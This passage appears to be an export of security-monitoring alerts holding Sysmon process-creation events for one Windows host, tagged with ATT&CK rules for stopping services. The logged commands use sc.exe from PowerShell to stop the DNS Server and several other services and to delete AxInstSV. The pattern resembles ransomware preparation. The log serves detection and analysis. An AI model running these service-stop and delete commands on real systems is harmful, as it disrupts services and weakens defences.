Disabled"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:31.181",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:02.878 +ProcessGuid: {df9fc3d3-b37a-5ecf-0000-00104f471e00} +ProcessId: 7284 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop ""DNS Server"" +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop \""DNS Server\""",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:02.881186000Z"",""eventRecordID"":""2447"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:02.878\r\nProcessGuid: {df9fc3d3-b37a-5ecf-0000-00104f471e00}\r\nProcessId: 7284\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop \""DNS Server\""\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:02.878"",""processGuid"":""{df9fc3d3-b37a-5ecf-0000-00104f471e00}"",""processId"":""7284"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop \\\""DNS Server\\\"""",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:31.134",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:02.828 +ProcessGuid: {df9fc3d3-b37a-5ecf-0000-0010ab441e00} +ProcessId: 3908 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Zational +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Zational",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:02.830839100Z"",""eventRecordID"":""2444"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:02.828\r\nProcessGuid: {df9fc3d3-b37a-5ecf-0000-0010ab441e00}\r\nProcessId: 3908\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Zational\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:02.828"",""processGuid"":""{df9fc3d3-b37a-5ecf-0000-0010ab441e00}"",""processId"":""3908"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Zational"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:31.103",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:02.785 +ProcessGuid: {df9fc3d3-b37a-5ecf-0000-0010e0421e00} +ProcessId: 2432 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Delete AxInstSV +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Delete AxInstSV",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:02.788392400Z"",""eventRecordID"":""2442"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:02.785\r\nProcessGuid: {df9fc3d3-b37a-5ecf-0000-0010e0421e00}\r\nProcessId: 2432\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Delete AxInstSV\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:02.785"",""processGuid"":""{df9fc3d3-b37a-5ecf-0000-0010e0421e00}"",""processId"":""2432"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Delete AxInstSV"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:31.088",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:02.772 +ProcessGuid: {df9fc3d3-b37a-5ecf-0000-001018421e00} +ProcessId: 4200 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop AxInstSV +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop AxInstSV",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:02.775636500Z"",""eventRecordID"":""2441"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:02.772\r\nProcessGuid: {df9fc3d3-b37a-5ecf-0000-001018421e00}\r\nProcessId: 4200\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop AxInstSV\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:02.772"",""processGuid"":""{df9fc3d3-b37a-5ecf-0000-001018421e00}"",""processId"":""4200"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop AxInstSV"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:31.027",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:02.719 +ProcessGuid: {df9fc3d3-b37a-5ecf-0000-0010843f1e00} +ProcessId: 6308 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop clr_optimization +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop clr_optimization",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:02.725883500Z"",""eventRecordID"":""2438"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:02.719\r\nProcessGuid: {df9fc3d3-b37a-5ecf-0000-0010843f1e00}\r\nProcessId: 6308\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop clr_optimization\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:02.719"",""processGuid"":""{df9fc3d3-b37a-5ecf-0000-0010843f1e00}"",""processId"":""6308"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop clr_optimization"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:30.984",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:02.660 +ProcessGuid: {df9fc3d3-b37a-5ecf-0000-0010e53c1e00} +ProcessId: 7752 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop aspnet_staters +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop aspnet_staters",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:02.667308300Z"",""eventRecordID"":""2435"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:02.660\r\nProcessGuid: {df9fc3d3-b37a-5ecf-0000-0010e53c1e00}\r\nProcessId: 7752\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop aspnet_staters\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:02.660"",""processGuid"":""{df9fc3d3-b37a-5ecf-0000-0010e53c1e00}"",""processId"":""7752"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop aspnet_staters"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:30.942",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:02.644 +ProcessGuid: {df9fc3d3-b37a-5ecf-0000-0010173c1e00} +ProcessId: 6724 +Image: C:\Windows\System32\sc.exe 